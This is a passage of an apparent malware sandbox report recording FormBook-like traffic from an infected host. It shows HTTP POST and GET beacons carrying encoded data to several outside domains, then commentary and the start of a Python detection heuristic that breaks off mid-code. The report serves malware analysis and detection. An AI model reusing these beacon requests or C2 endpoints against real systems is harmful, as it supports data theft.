                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavHksCJVlllC5wtF4SV/JlW3Rc10AJ7+0Kg1C3vlgYwxP
                      Aug 23, 2024 08:27:32.505795002 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:32 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                      Aug 23, 2024 08:27:32.505810022 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                      Aug 23, 2024 08:27:32.505821943 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                      Aug 23, 2024 08:27:32.505826950 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.6 | 49748 | 18.183.3.45 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:34.279300928 CEST | 796 | OUT | POST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:35.048188925 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:34 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.6 | 49749 | 18.183.3.45 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:36.829047918 CEST | 1809 | OUT | POST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:37.608541965 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:37 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.6 | 49750 | 18.183.3.45 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:39.370860100 CEST | 509 | OUT | GET /l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:40.154448986 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:40 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      29 | 192.168.2.6 | 49751 | 176.57.64.102 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:53.348455906 CEST | 757 | OUT | POST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:54.017492056 CEST | 749 | IN | HTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=saVwnY22lPcVFRRj7DXt; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:53 GMT
                      Date: Fri, 23 Aug 2024 06:27:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      30 | 192.168.2.6 | 49752 | 176.57.64.102 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:55.890667915 CEST | 781 | OUT | POST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:56.519932032 CEST | 749 | IN | HTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=xrV3g1EcKglXvx5gTa3Y; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:56 GMT
                      Date: Fri, 23 Aug 2024 06:27:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      31 | 192.168.2.6 | 49753 | 176.57.64.102 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:58.461055040 CEST | 1794 | OUT | POST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:59.121640921 CEST | 749 | IN | HTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=zktx3D3fuI3Ukxob0eWk; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:58 GMT
                      Date: Fri, 23 Aug 2024 06:27:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      32          192.168.2.6  49754        176.57.64.102   80                6008  C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp                             Bytes  Direction  Data
                      Aug 23, 2024 08:28:01.107059002 CEST  504    OUT        GET /rgqx/?Xn70_=k7UoFTYShwNh8X33bnwY0thhVqNwwmygtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXpJ/xTrqx42/2gBD027lgSoPVoYuqVtYfG9QcRyu7q583xH9wJHc=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:01.681355953 CEST  727    IN         HTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=VZpP6SRdlqwV0ic1DCHJ; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:28:01 GMT
                      Date: Fri, 23 Aug 2024 06:28:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                      33          192.168.2.6  49755        162.55.254.209  80                6008  C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp                             Bytes  Direction  Data
                      Aug 23, 2024 08:28:06.749094963 CEST  766    OUT        POST /qpwk/ HTTP/1.1
                      Host: www.anaidittrich.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.anaidittrich.com
                      Referer: http://www.anaidittrich.com/qpwk/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 31 37 48 56 4e 47 62 33 2b 34 57 65 5a 48 32 76 6a 63 69 43 31 4f 74 50 75 58 2f 61 34 48 61 37 4c 71 6c 51 69 76 77 66 44 5a 6f
                      Data Ascii: Xn70_=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8Zdrr17HVNGb3+4WeZH2vjciC1OtPuX/a4Ha7LqlQivwfDZo
                      Aug 23, 2024 08:28:07.442011118 CEST  1236   IN         HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:07 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                      Upgrade: h2c
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                      Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                      Aug 23, 2024 08:28:07.442030907 CEST  1236   IN         Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                      Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                      Aug 23, 2024 08:28:07.442060947 CEST  448    IN         Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                      Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                      Aug 23, 2024 08:28:07.442075014 CEST  1236   IN         Data Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                      Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                      Aug 23, 2024 08:28:07.442086935 CEST  1236   IN         Data Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                      Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
                      Aug 23, 2024 08:28:07.442100048 CEST  448    IN         Data Raw: 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63
                      Data Ascii: :100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}</style><s
                      Aug 23, 2024 08:28:07.442111969 CEST  1236   IN         Data Raw: 2d 62 6c 6f 63 6b 2d 67 72 6f 75 70 2d 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 29 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63
                      Data Ascii: -block-group-is-layout-constrained){position:relative}</style><style id='wp-block-navigation-link-inline-css'>.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__des
                      Aug 23, 2024 08:28:07.442123890 CEST  1236   IN         Data Raw: 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 33 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 6c 65 66 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77
                      Data Ascii: ng-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=ver
                      Aug 23, 2024 08:28:07.442150116 CEST  448    IN         Data Raw: 09 09 09 09 63 6f 6e 74 65 6e 74 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 3a 2d 6d 6f 7a 2d 6f 6e 6c 79 2d 77 68 69 74 65 73 70 61 63 65 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09
                      Data Ascii: content: none;}.is-style-asterisk:-moz-only-whitespace:before {content: none;}.is-style-asterisk.has-text-align-center:before {margin: 0 auto;}.is-style-asterisk.has-text-align-right:before {
                      Aug 23, 2024 08:28:07.442161083 CEST  1236   IN         Data Raw: 72 65 67 75 6c 61 72 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 69 73 2d 6c 61 72 67 65 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 65 6d 7d 2e 69 73 2d 6c 61 72 67 65 72 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69
                      Data Ascii: regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:u
                      Aug 23, 2024 08:28:07.446976900 CEST  1236   IN         Data Raw: 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 73 65 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70
                      Data Ascii: ;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{max-w
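Sessions 32 and 33 above show the two halves of the same beacon shape: a GET to a four-letter directory (/rgqx/) carrying one opaque query parameter, and POSTs to another four-letter directory (/qpwk/) carrying the same parameter name Xn70_ as a form body, both with the same hard-coded Android tablet User-Agent, Connection: close, and, on the POSTs, Origin and Referer set to the beacon URL itself. The 404 bodies come from unrelated hosting (a Tilda placeholder, a German WordPress site), which is consistent with FormBook contacting decoy domains alongside its real C2; the report itself only records the traffic. The Python below is an added example, not part of the Joe Sandbox report: it parses raw requests in the form printed above and reports which of those traits each one exhibits. The User-Agent string and the two sample requests are copied from sessions 32 and 33 (headers abbreviated); the trait names, the length threshold, the three-trait decision rule and the benign control request are my own assumptions.

```python
# Added example (not part of the Joe Sandbox report): heuristics for the
# FormBook beacon shape visible in the sessions above. Trait names, the
# length threshold and the decision rule are assumptions made for illustration.
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Copied verbatim from the User-Agent header of the requests in this report.
FORMBOOK_UA = (
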